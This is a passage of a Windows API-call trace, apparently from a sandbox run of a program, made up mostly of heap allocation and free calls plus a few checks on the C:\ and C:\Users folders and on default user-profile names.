(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de100 | out: hHeap=0x8a0000) returned 1 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de100 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1950 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0157.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1910 [0157.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1940 | out: hHeap=0x8a0000) returned 1 [0157.030] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de150 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1940 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5d0 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0157.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0157.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0157.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d5a8 [0157.030] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0157.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba528 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0157.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de178 [0157.030] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0157.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de178 | out: hHeap=0x8a0000) returned 1 [0157.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4c8 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8dafd0 [0157.031] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de178 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0a8 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0157.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0157.031] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0157.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba468 | out: hHeap=0x8a0000) returned 1 [0157.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0a8 | out: hHeap=0x8a0000) returned 1 [0157.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de178 | out: hHeap=0x8a0000) returned 1 [0157.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d5e8 [0157.031] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0157.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0a8 [0157.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0157.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0a8 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d5e8 | out: hHeap=0x8a0000) returned 1 [0157.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0a8 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba468 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dafd0 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4c8 | out: hHeap=0x8a0000) returned 1 [0157.032] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c:", cchCount1=2, lpString2="C:", cchCount2=2) returned 2 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba528 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0a8 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0157.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x91d5e8 [0157.032] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d5e8 | out: hHeap=0x8a0000) returned 1 [0157.032] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d5a8 | out: hHeap=0x8a0000) returned 1 [0157.032] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0157.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1870 [0157.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0157.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0157.032] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0157.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf348 | out: hHeap=0x8a0000) returned 1 [0157.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de178 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e17c0 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0d8 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0a8 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a60 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba528 [0157.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a60 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1920 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0157.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1920 | out: hHeap=0x8a0000) returned 1 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1920 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba480 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0157.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba4b0 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0b0 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de128 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0157.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0157.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0157.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de808 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba108 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba150 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0157.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a50 [0157.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a50 [0157.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a40 [0157.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a40 | out: hHeap=0x8a0000) returned 1 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba030 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a40 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba558 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8dafd0 [0157.035] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1c8 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0157.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba060 | out: hHeap=0x8a0000) returned 1 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1f0 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba060 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0157.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba348 [0157.035] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba300 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba360 [0157.036] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0157.036] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Default|Defaultuser|Defaultuser0|Default User", cchCount1=45, lpString2="|", cchCount2=1) returned 3 [0157.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0157.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0157.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0157.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0157.036] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0157.036] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0157.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.036] GetFileAttributesW (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de948 | out: hHeap=0x8a0000) returned 1 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0157.037] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f544) returned 0 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba630 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b80 | out: hHeap=0x8a0000) returned 1 [0157.037] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de948 | out: hHeap=0x8a0000) returned 1 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.037] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0157.038] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2="\\", cchCount2=1) returned 3 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba630 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b80 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de948 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b80 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba630 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba438 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0157.038] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba438 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba630 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b80 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0157.038] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0157.039] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de948 | out: hHeap=0x8a0000) returned 1 [0157.039] PeekMessageW (in: lpMsg=0x87f544, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 